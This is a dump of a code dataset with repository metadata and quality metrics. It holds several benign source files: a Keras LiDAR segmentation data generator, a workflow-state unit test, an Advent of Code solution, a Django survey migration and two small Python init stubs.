hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d47a8eecc9aab9cdb32976b68d704b9abdee47fc
| 9,159
|
py
|
Python
|
generator.py
|
tzhong518/Human-Segmentation-with-Dynamic-LiDAR-Data
|
5b55b36a48ee95aaa4449e67ad7410466a109ff4
|
[
"Apache-2.0"
] | 4
|
2021-08-11T14:00:41.000Z
|
2022-01-21T14:10:08.000Z
|
generator.py
|
tzhong518/Human-Segmentation-with-Dynamic-LiDAR-Data
|
5b55b36a48ee95aaa4449e67ad7410466a109ff4
|
[
"Apache-2.0"
] | null | null | null |
generator.py
|
tzhong518/Human-Segmentation-with-Dynamic-LiDAR-Data
|
5b55b36a48ee95aaa4449e67ad7410466a109ff4
|
[
"Apache-2.0"
] | null | null | null |
from keras import backend as K
import h5py
import numpy as np
import glob
import random
import mtutil
from mtutil import pixelwise_categorical_accuracy
from keras import metrics
from keras.models import load_model
from keras.optimizers import Adam
import xml.etree.ElementTree as ET
class DataGenerator_multi_ver02(object):
def __init__(self):
self.reset()
def reset(self):
self.depth = []
self.labels = []
self.vel = []
self.seq_depth = []
self.seq_labels = []
self.seq_human_vel = []
self.seq_vel = []
self.array_depth = []
self.array_labels = []
self.array_vel = []
self.inputs = []
def flow_from_directory(self, directory, nb_labels = 2, nb_seq=1, nb_frame = 32, frame_rate = 2):
h5_directory = directory + '_h5file/'
all_files = sorted(glob.glob( h5_directory+'/*.h5' ))
while True:
seq_length = int(len(all_files)/nb_frame)
for count in range(nb_seq):
seq_number = random.randint(0,seq_length-1)
frame_files = all_files[seq_number*nb_frame:seq_number*nb_frame+nb_frame]
frame_count = random.randint(0, nb_frame-frame_rate)
files = frame_files[frame_count:frame_count+frame_rate]
count_label = 1
for file in files:
h5file = h5py.File(file,'r')
lx = np.single(h5file['/depth'].value)
lx = lx / 1000 # 1[m] -> 1
lx = lx.reshape( (lx.shape[0], lx.shape[1], -1 ) )
self.depth.append( lx )
if count_label == len(files):
defect_mask = (lx[:, :, 0] > 0)
defect_mask = defect_mask.reshape( (defect_mask.shape[0], defect_mask.shape[1], 1) )
label = np.single(h5file['/label'].value)
ly = np.zeros( (label.shape[0], label.shape[1], nb_labels ) )
lv = np.single(h5file['/velocity'].value) / 1000 # 1[m] -> 1
if np.sum(label>0) > 0:
gain = np.sum(label==0)/np.sum(label>0)
else:
gain = 1
for h in range(32):
for w in range(1024):
if label[h][w] > 0:
ly[h][w][1] = gain
else:
ly[h][w][0] = 1
mask = (ly[:,:,1] > 0)
mask = mask.reshape( (mask.shape[0], mask.shape[1], 1 ) )
else:
count_label += 1
lv = lv * defect_mask
self.depth.append( mask )
self.depth.append( defect_mask )
self.array_depth = np.asarray(self.depth)
self.seq_labels.append( ly )
self.seq_vel.append( lv )
self.seq_human_vel.append( lv*mask )
inputs = np.asarray(self.array_depth, dtype=np.float32)
inputs = inputs.reshape( (1, frame_rate+2, 32, 1024, 1) )
targets00 = np.asarray(self.seq_labels, dtype=np.float32)
targets01 = np.asarray(self.seq_vel, dtype=np.float32)
targets02 = np.asarray(self.seq_human_vel, dtype=np.float32)
targets = [targets00, targets01, targets01, targets02]
self.reset()
yield inputs, targets
def flow_from_directory_ver2(self, directory, nb_labels = 2, nb_seq=1, nb_frame = 32, frame_rate = 2):
h5_directory = directory + '_h5file/'
all_files = sorted(glob.glob( h5_directory+'/*.h5' ))
while True:
seq_length = int(len(all_files)/nb_frame)
for count in range(nb_seq):
seq_number = random.randint(0,seq_length-1)
frame_files = all_files[seq_number*nb_frame:seq_number*nb_frame+nb_frame]
frame_count = random.randint(0, nb_frame-frame_rate)
files = frame_files[frame_count:frame_count+frame_rate]
count_label = 1
for file in files:
h5file = h5py.File(file,'r')
lx = np.single(h5file['/depth'].value)
lx = lx / 1000 # 1[m] -> 1
lx = lx.reshape( (lx.shape[0], lx.shape[1], -1 ) )
self.depth.append( lx )
if count_label == len(files):
defect_mask = (lx[:, :, 0] > 0)
defect_mask = defect_mask.reshape( (defect_mask.shape[0], defect_mask.shape[1], 1) )
label = np.single(h5file['/label'].value)
ly = np.zeros( (label.shape[0], label.shape[1], nb_labels ) )
lv = np.single(h5file['/velocity'].value) / 1000 # 1[m] -> 1
if np.sum(label>0) > 0:
gain = np.sum(label==0)/np.sum(label>0)
else:
gain = 1
for h in range(32):
for w in range(1024):
if label[h][w] > 0:
ly[h][w][1] = gain
else:
ly[h][w][0] = 1
mask = (ly[:,:,1] > 0)
mask = mask.reshape( (mask.shape[0], mask.shape[1], 1 ) )
else:
count_label += 1
lv = lv * defect_mask
self.depth.append( mask )
self.depth.append( defect_mask )
self.array_depth = np.asarray(self.depth)
self.seq_labels.append( ly )
self.seq_vel.append( lv )
self.seq_human_vel.append( lv*mask )
inputs = np.asarray(self.array_depth, dtype=np.float32)
inputs = inputs.reshape( ( nb_seq, frame_rate+2, 32, 1024, 1))
targets00 = np.asarray(self.seq_labels, dtype=np.float32)
targets00 = targets00.reshape(( nb_seq, 32, 1024, 2))
targets01 = np.asarray(self.seq_vel, dtype=np.float32)
targets01 = targets01.reshape((nb_seq, 32, 1024, 2))
targets02 = np.asarray(self.seq_human_vel, dtype=np.float32)
targets02 = targets02.reshape(( nb_seq, 32, 1024,2))
targets = [targets00, targets01, targets01, targets02]
self.reset()
yield inputs, targets
def flow_from_directory_novelo(self, directory, nb_labels = 2, nb_seq=1, nb_frame = 32, frame_rate = 2):
h5_directory = directory + '_h5file/'
all_files = sorted(glob.glob( h5_directory+'/*.h5' ))
while True:
seq_length = int(len(all_files)/nb_frame)
for count in range(nb_seq):
seq_number = random.randint(0,seq_length-1)
frame_files = all_files[seq_number*nb_frame:seq_number*nb_frame+nb_frame]
frame_count = random.randint(0, nb_frame-frame_rate)
files = frame_files[frame_count:frame_count+frame_rate]
count_label = 1
for file in files:
h5file = h5py.File(file,'r')
lx = np.single(h5file['/depth'].value)
lx = lx / 1000 # 1[m] -> 1
lx = lx.reshape( (lx.shape[0], lx.shape[1], -1 ) )
self.depth.append( lx )
if count_label == len(files):
defect_mask = (lx[:, :, 0] > 0)
defect_mask = defect_mask.reshape( (defect_mask.shape[0], defect_mask.shape[1], 1) )
label = np.single(h5file['/label'].value)
ly = np.zeros( (label.shape[0], label.shape[1], nb_labels ) )
if np.sum(label>0) > 0:
gain = np.sum(label==0)/np.sum(label>0)
else:
gain = 1
for h in range(32):
for w in range(1024):
if label[h][w] > 0:
ly[h][w][1] = gain
else:
ly[h][w][0] = 1
mask = (ly[:,:,1] > 0)
mask = mask.reshape( (mask.shape[0], mask.shape[1], 1 ) )
else:
count_label += 1
self.depth.append( mask )
self.depth.append( defect_mask )
self.array_depth = np.asarray(self.depth)
self.seq_labels.append( ly )
inputs = np.asarray(self.array_depth, dtype=np.float32)
inputs = inputs.reshape( (1, frame_rate+2, 32, 1024, 1) )
targets00 = np.asarray(self.seq_labels, dtype=np.float32)
self.reset()
yield inputs, targets00
| 47.455959
| 108
| 0.477454
| 1,058
| 9,159
| 3.970699
| 0.094518
| 0.047608
| 0.040229
| 0.023566
| 0.871459
| 0.869317
| 0.855749
| 0.855749
| 0.855749
| 0.835753
| 0
| 0.053819
| 0.409652
| 9,159
| 193
| 109
| 47.455959
| 0.723137
| 0.00535
| 0
| 0.814607
| 0
| 0
| 0.010545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02809
| false
| 0
| 0.061798
| 0
| 0.095506
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e10bd4155433eb1541f27a2623b6bf0a8468041
| 3,897
|
py
|
Python
|
mistral/tests/unit/workflow/test_states.py
|
soda-research/mistral
|
550a3de9c2defc7ce26336cb705d9c8d87bbaddd
|
[
"Apache-2.0"
] | 205
|
2015-06-21T11:51:47.000Z
|
2022-03-05T04:00:04.000Z
|
mistral/tests/unit/workflow/test_states.py
|
soda-research/mistral
|
550a3de9c2defc7ce26336cb705d9c8d87bbaddd
|
[
"Apache-2.0"
] | 21
|
2015-04-14T22:41:53.000Z
|
2019-02-20T09:30:10.000Z
|
mistral/tests/unit/workflow/test_states.py
|
soda-research/mistral
|
550a3de9c2defc7ce26336cb705d9c8d87bbaddd
|
[
"Apache-2.0"
] | 110
|
2015-06-14T03:34:38.000Z
|
2021-11-11T12:12:56.000Z
|
# Copyright 2013 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mistral.tests.unit import base
from mistral.workflow import states as s
class StatesModuleTest(base.BaseTest):
def test_is_valid_transition(self):
# From IDLE
self.assertTrue(s.is_valid_transition(s.IDLE, s.IDLE))
self.assertTrue(s.is_valid_transition(s.IDLE, s.RUNNING))
self.assertTrue(s.is_valid_transition(s.IDLE, s.ERROR))
self.assertFalse(s.is_valid_transition(s.IDLE, s.PAUSED))
self.assertFalse(s.is_valid_transition(s.IDLE, s.RUNNING_DELAYED))
self.assertFalse(s.is_valid_transition(s.IDLE, s.SUCCESS))
# From RUNNING
self.assertTrue(s.is_valid_transition(s.RUNNING, s.RUNNING))
self.assertTrue(s.is_valid_transition(s.RUNNING, s.ERROR))
self.assertTrue(s.is_valid_transition(s.RUNNING, s.PAUSED))
self.assertTrue(s.is_valid_transition(s.RUNNING, s.RUNNING_DELAYED))
self.assertTrue(s.is_valid_transition(s.RUNNING, s.SUCCESS))
self.assertFalse(s.is_valid_transition(s.RUNNING, s.IDLE))
# From PAUSED
self.assertTrue(s.is_valid_transition(s.PAUSED, s.PAUSED))
self.assertTrue(s.is_valid_transition(s.PAUSED, s.RUNNING))
self.assertTrue(s.is_valid_transition(s.PAUSED, s.ERROR))
self.assertFalse(s.is_valid_transition(s.PAUSED, s.RUNNING_DELAYED))
self.assertFalse(s.is_valid_transition(s.PAUSED, s.SUCCESS))
self.assertFalse(s.is_valid_transition(s.PAUSED, s.IDLE))
# From DELAYED
self.assertTrue(
s.is_valid_transition(s.RUNNING_DELAYED, s.RUNNING_DELAYED)
)
self.assertTrue(s.is_valid_transition(s.RUNNING_DELAYED, s.RUNNING))
self.assertTrue(s.is_valid_transition(s.RUNNING_DELAYED, s.ERROR))
self.assertFalse(s.is_valid_transition(s.RUNNING_DELAYED, s.PAUSED))
self.assertFalse(s.is_valid_transition(s.RUNNING_DELAYED, s.SUCCESS))
self.assertFalse(s.is_valid_transition(s.RUNNING_DELAYED, s.IDLE))
# From SUCCESS
self.assertTrue(s.is_valid_transition(s.SUCCESS, s.SUCCESS))
self.assertFalse(s.is_valid_transition(s.SUCCESS, s.RUNNING))
self.assertFalse(s.is_valid_transition(s.SUCCESS, s.ERROR))
self.assertFalse(s.is_valid_transition(s.SUCCESS, s.PAUSED))
self.assertFalse(s.is_valid_transition(s.SUCCESS, s.RUNNING_DELAYED))
self.assertFalse(s.is_valid_transition(s.SUCCESS, s.IDLE))
# From ERROR
self.assertTrue(s.is_valid_transition(s.ERROR, s.ERROR))
self.assertTrue(s.is_valid_transition(s.ERROR, s.RUNNING))
self.assertFalse(s.is_valid_transition(s.ERROR, s.PAUSED))
self.assertFalse(s.is_valid_transition(s.ERROR, s.RUNNING_DELAYED))
self.assertFalse(s.is_valid_transition(s.ERROR, s.SUCCESS))
self.assertFalse(s.is_valid_transition(s.ERROR, s.IDLE))
# From WAITING
self.assertTrue(s.is_valid_transition(s.WAITING, s.RUNNING))
self.assertFalse(s.is_valid_transition(s.WAITING, s.SUCCESS))
self.assertFalse(s.is_valid_transition(s.WAITING, s.PAUSED))
self.assertFalse(s.is_valid_transition(s.WAITING, s.RUNNING_DELAYED))
self.assertFalse(s.is_valid_transition(s.WAITING, s.IDLE))
self.assertFalse(s.is_valid_transition(s.WAITING, s.ERROR))
| 49.961538
| 77
| 0.715679
| 560
| 3,897
| 4.801786
| 0.158929
| 0.111938
| 0.271848
| 0.281145
| 0.760878
| 0.760878
| 0.760878
| 0.740424
| 0.730755
| 0.433247
| 0
| 0.002481
| 0.172697
| 3,897
| 77
| 78
| 50.61039
| 0.831576
| 0.170644
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.875
| 1
| 0.020833
| false
| 0
| 0.041667
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf1c2e1ea2e6f0c5209d4ed5a4540a27a5553050
| 2,317
|
py
|
Python
|
day1A.py
|
BookOwl/advent2017
|
d9d07dd849fa9b56d636d04fd2de9f6cef4266b5
|
[
"Unlicense"
] | 1
|
2017-12-08T22:30:58.000Z
|
2017-12-08T22:30:58.000Z
|
day1A.py
|
BookOwl/advent2017
|
d9d07dd849fa9b56d636d04fd2de9f6cef4266b5
|
[
"Unlicense"
] | null | null | null |
day1A.py
|
BookOwl/advent2017
|
d9d07dd849fa9b56d636d04fd2de9f6cef4266b5
|
[
"Unlicense"
] | null | null | null |
def find_matches(s):
s = s + s[0]
m = []
for i in range(0, len(s) - 1):
if s[i] == s[i+1]:
m.append(int(s[i]))
return m
def captcha(s):
return sum(find_matches(s))
if __name__ == '__main__':
s = "428122498997587283996116951397957933569136949848379417125362532269869461185743113733992331379856446362482129646556286611543756564275715359874924898113424472782974789464348626278532936228881786273586278886575828239366794429223317476722337424399239986153675275924113322561873814364451339186918813451685263192891627186769818128715595715444565444581514677521874935942913547121751851631373316122491471564697731298951989511917272684335463436218283261962158671266625299188764589814518793576375629163896349665312991285776595142146261792244475721782941364787968924537841698538288459355159783985638187254653851864874544584878999193242641611859756728634623853475638478923744471563845635468173824196684361934269459459124269196811512927442662761563824323621758785866391424778683599179447845595931928589255935953295111937431266815352781399967295389339626178664148415561175386725992469782888757942558362117938629369129439717427474416851628121191639355646394276451847131182652486561415942815818785884559193483878139351841633366398788657844396925423217662517356486193821341454889283266691224778723833397914224396722559593959125317175899594685524852419495793389481831354787287452367145661829287518771631939314683137722493531318181315216342994141683484111969476952946378314883421677952397588613562958741328987734565492378977396431481215983656814486518865642645612413945129485464979535991675776338786758997128124651311153182816188924935186361813797251997643992686294724699281969473142721116432968216434977684138184481963845141486793996476793954226225885432422654394439882842163295458549755137247614338991879966665925466545111899714943716571113326479432925939227996799951279485722836754457737668191845914566732285928453781818792236447816127492445993945894435692799839217467253986218213131249786833333936332257795191937942688668182629489191693154184177398186462481316834678733713614889439352976144726162214648922159719979143735815478633912633185334529484779322818611438194522292278787653763328944421516569181178517915745625295158611636365253948455727653672922299582352766484"
print(captcha(s))
| 165.5
| 2,062
| 0.941303
| 46
| 2,317
| 47.195652
| 0.478261
| 0.002764
| 0.011055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.921147
| 0.036685
| 2,317
| 14
| 2,063
| 165.5
| 0.051523
| 0
| 0
| 0
| 0
| 0
| 0.888697
| 0.885246
| 0
| 1
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0.083333
| 0.333333
| 0.083333
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cf8482278a89053f33471c89cb401e85783ae963
| 323
|
py
|
Python
|
src/spaceone/plugin/manager/__init__.py
|
choonho/plugin
|
42961ee4c84495dd2247f4f1792ce2b7c8565086
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/plugin/manager/__init__.py
|
choonho/plugin
|
42961ee4c84495dd2247f4f1792ce2b7c8565086
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/plugin/manager/__init__.py
|
choonho/plugin
|
42961ee4c84495dd2247f4f1792ce2b7c8565086
|
[
"Apache-2.0"
] | null | null | null |
from spaceone.plugin.manager.plugin_manager.__init__ import *
from spaceone.plugin.manager.supervisor_manager.__init__ import *
#from spaceone.plugin.manager.supervisor_manager.supervisor_state import *
#from spaceone.plugin.manager.supervisor_ref_manager import *
#from spaceone.plugin.manager.plugin_ref_manager import *
| 53.833333
| 74
| 0.857585
| 41
| 323
| 6.365854
| 0.219512
| 0.298851
| 0.344828
| 0.478927
| 0.842912
| 0.582375
| 0.425287
| 0.425287
| 0.425287
| 0
| 0
| 0
| 0.06192
| 323
| 5
| 75
| 64.6
| 0.861386
| 0.585139
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d85a62d002375b20de2a78ac3f460e81c5942747
| 162
|
py
|
Python
|
env/Lib/site-packages/mosek/_mskpreload.py
|
PatrickRatei/eVTOL
|
7992e45e59d9c0743857e4b2ddb5ffa2f0298bd4
|
[
"MIT"
] | null | null | null |
env/Lib/site-packages/mosek/_mskpreload.py
|
PatrickRatei/eVTOL
|
7992e45e59d9c0743857e4b2ddb5ffa2f0298bd4
|
[
"MIT"
] | null | null | null |
env/Lib/site-packages/mosek/_mskpreload.py
|
PatrickRatei/eVTOL
|
7992e45e59d9c0743857e4b2ddb5ffa2f0298bd4
|
[
"MIT"
] | null | null | null |
import ctypes,os.path
ctypes.CDLL(os.path.join(os.path.dirname(__file__),"cilkrts20.dll"))
ctypes.CDLL(os.path.join(os.path.dirname(__file__),"mosek64_9_2.dll"))
| 40.5
| 70
| 0.777778
| 28
| 162
| 4.142857
| 0.464286
| 0.258621
| 0.206897
| 0.275862
| 0.637931
| 0.637931
| 0.637931
| 0.637931
| 0.637931
| 0
| 0
| 0.037975
| 0.024691
| 162
| 3
| 71
| 54
| 0.696203
| 0
| 0
| 0
| 0
| 0
| 0.17284
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d868d231bc5b6193303338f654755f397316b884
| 6,849
|
py
|
Python
|
surveys/migrations/0001_initial.py
|
inclusive-design/coop-map-directory-index
|
b215ea95677dc90fafe60eaa494a4fd6af0431fb
|
[
"BSD-3-Clause"
] | 1
|
2020-01-28T16:16:49.000Z
|
2020-01-28T16:16:49.000Z
|
surveys/migrations/0001_initial.py
|
inclusive-design/coop-map-directory-index
|
b215ea95677dc90fafe60eaa494a4fd6af0431fb
|
[
"BSD-3-Clause"
] | 114
|
2020-02-12T20:22:07.000Z
|
2021-09-22T18:29:50.000Z
|
surveys/migrations/0001_initial.py
|
inclusive-design/coop-map-directory-index
|
b215ea95677dc90fafe60eaa494a4fd6af0431fb
|
[
"BSD-3-Clause"
] | 4
|
2020-04-21T21:09:25.000Z
|
2021-01-08T14:18:58.000Z
|
# Generated by Django 3.0.3 on 2020-05-03 03:42
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ecosystem2020Questions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('column_name', models.CharField(max_length=2)),
('question', models.CharField(blank=True, max_length=254)),
],
options={
'db_table': 'surveys_ecosystem2020_questions',
'managed': False,
},
),
migrations.CreateModel(
name='Ecosystem2020',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('a', models.DateTimeField(auto_now=True)),
('b', models.CharField(blank=True, max_length=254)),
('c', models.CharField(blank=True, max_length=254)),
('d', models.CharField(blank=True, max_length=254)),
('e', models.CharField(blank=True, max_length=254)),
('f', models.CharField(blank=True, max_length=254)),
('g', models.CharField(blank=True, max_length=254)),
('h', models.CharField(blank=True, max_length=254)),
('i', models.CharField(blank=True, max_length=254)),
('j', models.CharField(blank=True, max_length=254)),
('k', models.CharField(blank=True, max_length=254)),
('l', models.CharField(blank=True, max_length=254)),
('m', models.CharField(blank=True, max_length=254)),
('n', models.CharField(blank=True, max_length=254)),
('o', models.CharField(blank=True, max_length=254)),
('p', models.CharField(blank=True, max_length=254)),
('q', models.CharField(blank=True, max_length=254)),
('r', models.CharField(blank=True, max_length=254)),
('s', models.CharField(blank=True, max_length=254)),
('t', models.CharField(blank=True, max_length=254)),
('u', models.CharField(blank=True, max_length=254)),
('v', models.CharField(blank=True, max_length=254)),
('w', models.CharField(blank=True, max_length=254)),
('x', models.CharField(blank=True, max_length=254)),
('y', models.CharField(blank=True, max_length=254)),
('z', models.CharField(blank=True, max_length=254)),
('aa', models.CharField(blank=True, max_length=254)),
('ab', models.CharField(blank=True, max_length=254)),
('ac', models.CharField(blank=True, max_length=254)),
('ad', models.CharField(blank=True, max_length=254)),
('ae', models.CharField(blank=True, max_length=254)),
('af', models.CharField(blank=True, max_length=254)),
('ag', models.CharField(blank=True, max_length=254)),
('ah', models.CharField(blank=True, max_length=254)),
('ai', models.CharField(blank=True, max_length=254)),
('aj', models.CharField(blank=True, max_length=254)),
('ak', models.CharField(blank=True, max_length=254)),
('al', models.CharField(blank=True, max_length=254)),
('am', models.CharField(blank=True, max_length=254)),
('an', models.CharField(blank=True, max_length=254)),
('ao', models.CharField(blank=True, max_length=254)),
('ap', models.CharField(blank=True, max_length=254)),
('aq', models.CharField(blank=True, max_length=254)),
('ar', models.CharField(blank=True, max_length=254)),
('as_field', models.CharField(blank=True, max_length=254)),
('at', models.CharField(blank=True, max_length=254)),
('au', models.CharField(blank=True, max_length=254)),
('av', models.CharField(blank=True, max_length=254)),
('aw', models.CharField(blank=True, max_length=254)),
('ax', models.CharField(blank=True, max_length=254)),
('ay', models.CharField(blank=True, max_length=254)),
('az', models.CharField(blank=True, max_length=254)),
('ba', models.CharField(blank=True, max_length=254)),
('bb', models.CharField(blank=True, max_length=254)),
('bc', models.CharField(blank=True, max_length=254)),
('bd', models.CharField(blank=True, max_length=254)),
('be', models.CharField(blank=True, max_length=254)),
('bf', models.CharField(blank=True, max_length=254)),
('bg', models.CharField(blank=True, max_length=254)),
('bh', models.CharField(blank=True, max_length=254)),
('bi', models.CharField(blank=True, max_length=254)),
('bj', models.CharField(blank=True, max_length=254)),
('bk', models.CharField(blank=True, max_length=254)),
('bl', models.CharField(blank=True, max_length=254)),
('bm', models.CharField(blank=True, max_length=254)),
('bn', models.CharField(blank=True, max_length=254)),
('bo', models.CharField(blank=True, max_length=254)),
('bp', models.CharField(blank=True, max_length=254)),
('bq', models.CharField(blank=True, max_length=254)),
('br', models.CharField(blank=True, max_length=254)),
('bs', models.CharField(blank=True, max_length=254)),
('bt', models.CharField(blank=True, max_length=254)),
('bu', models.CharField(blank=True, max_length=254)),
('bv', models.CharField(blank=True, max_length=254)),
('bw', models.CharField(blank=True, max_length=254)),
('bx', models.CharField(blank=True, max_length=254)),
('by', models.CharField(blank=True, max_length=254)),
('bz', models.CharField(blank=True, max_length=254)),
('ca', models.CharField(blank=True, max_length=254)),
('cb', models.CharField(blank=True, max_length=254)),
('cc', models.CharField(blank=True, max_length=254)),
('cd', models.CharField(blank=True, max_length=254)),
('ce', models.CharField(blank=True, max_length=254)),
],
options={
'db_table': 'surveys_ecosystem2020',
'managed': True,
},
),
]
| 57.075
| 114
| 0.552051
| 757
| 6,849
| 4.865258
| 0.175694
| 0.342112
| 0.45072
| 0.540863
| 0.872658
| 0.872658
| 0.872658
| 0.080912
| 0.080912
| 0.080912
| 0
| 0.0573
| 0.283983
| 6,849
| 119
| 115
| 57.554622
| 0.693719
